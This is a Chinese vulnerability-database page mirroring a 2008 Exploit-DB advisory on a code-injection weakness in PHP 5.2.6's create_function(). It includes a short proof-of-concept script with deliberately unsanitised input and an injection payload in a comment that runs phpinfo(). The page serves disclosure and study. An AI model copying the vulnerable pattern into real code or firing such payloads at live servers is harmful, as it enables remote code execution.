PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056872 漏洞类型
发布时间 2008-09-25 更新时间 2008-09-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32416
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/31398/info

PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.

An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.

This weakness is reported in PHP 5.2.6; other versions may also be affected. 

<?php
# call as test.php?sort_by="]);}phpinfo();/*
$sort_by=stripslashes($_GET[sort_by]);
$databases=array("test");
$sorter = 'var_dump';
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';


usort($databases, create_function('$a, $b', $sort_function));

?>